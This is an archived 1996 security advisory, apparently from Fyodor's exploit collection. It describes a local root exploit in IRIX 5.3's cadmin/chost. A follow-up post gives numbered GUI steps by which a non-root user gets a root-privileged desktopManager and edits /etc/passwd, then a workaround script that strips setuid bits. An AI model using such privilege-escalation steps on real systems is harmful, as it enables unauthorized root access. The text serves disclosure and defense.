IRIX 5.3 chost apparently fails to drip privileges sufficiently when an invalid root password is entered
Grant Kaufmann (firstname.lastname@example.org)
IRIX 5.3 with vulnerable chost.
6 August 1996
The SGI patch may not always plug the hole!
From: Bill Nickless (nickless@MCS.ANL.GOV)
Date: Wed, 14 Aug 1996 13:08:14 -0500
I did a little experimentation and found that there's another precondition
for this cadmin exploit to work. You cannot have a desktopManager process
already running as you when you start the process.
First, verification that we're running the right patch levels and such:
flying% uname -a
IRIX flying 5.3 11091811 IP19 mips
flying% versions -b | cut -c35-199 | grep Patch
Patch SG0000813: Provide icrash on 5.3
Patch SG0000852: SCSI roll up for 5.3 without XFS
Patch SG0000870: 5.3 EFS rollup patch for all 5.3 non-XFS releases
Patch SG0000900: rev 3.17 io4prom patch
Patch SG0000918: RE OpenGL Extensions, Aux Buffers, and Bug Fix Rollup
Patch SG0001020: Security fix for login and telnetd
Patch SG0001092: networking rollup, fixes for hangs on socket data, new mrouted
Patch SG0001096: Objectsystem & Removable Media Software roll up
Patch SG0001102: NFS roll-up
Patch SG0001116: 5.3/5.3XFS combined kernel roll up patch
Patch SG0001128: CERT VU 15781
Patch SG0001146: sendmail security bug in queue management
Patch SG0001157: Change hinv to recognize all IMPACT gfx
Patch SG0001324: Fix for security loophole in the desktop permissions panel
flying% cd /usr/Cadmin/bin
flying% ls -l cimport
-rwsr-xr-x 1 root sys 161896 Apr 9 00:29 cimport
flying% sum cimport
62654 317 cimport
flying% df | grep nfs
cavesound:/usr/tmp nfs 3052196 2725027 327169 89% /mnt
Now for the exploit, run as a regular non-root user:
1. From any shell prompt: killall -9 desktopManager
2. From /usr/Cadmin/bin, run ./cadmin.
3. Click on "New" as if you were going to create a new NFS mount point.
4. A dialog window will appear asking for the root password. Enter something
other than the root password into the password field. Click on "OK".
5. An error dialong window will appear warning that you have entered an
incorrect password. Click on "OK".
6. You are then returned to the root password-requesting dialong window.
Click on "Cancel."
7. Doubleclick on the folder icon of the previously-mounted NFS filesystem.
This will start a desktopManager process, ostensibly running as you the
user, but actually running with some root priveleges.
8. In the top of the desktopManager window, replace the pathname of the
previously-mounted NFS filesystem with /etc
9. Scroll down to passwd, doubleclick, and edit to your heart's content
in the jot window that gets created.
Once again, the workaround shell script fragment than eliminates this exposure:
# Exploit from http://www.eecs.nwu.edu/~jmeyers/bugtraq/1099.html
# will work even with the patches installed as of 13 August 1996.
# Accordingly, turning off the suid bits on the Cadmin programs.
for p in cexport cformat chaltsys chost chostInfo cimport clogin \
cmidi configClogin cpeople cports cpuView csetup cswap \
diskView tapeView videoView
/bin/chmod u-s /usr/Cadmin/bin/$p
Bill Nickless email@example.com +1 630 252 7390
PGP 2.6.2 Key fingerprint = 0E 0F 16 80 C5 B1 69 52 E1 44 1A A5 0E 1B 74 F7
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: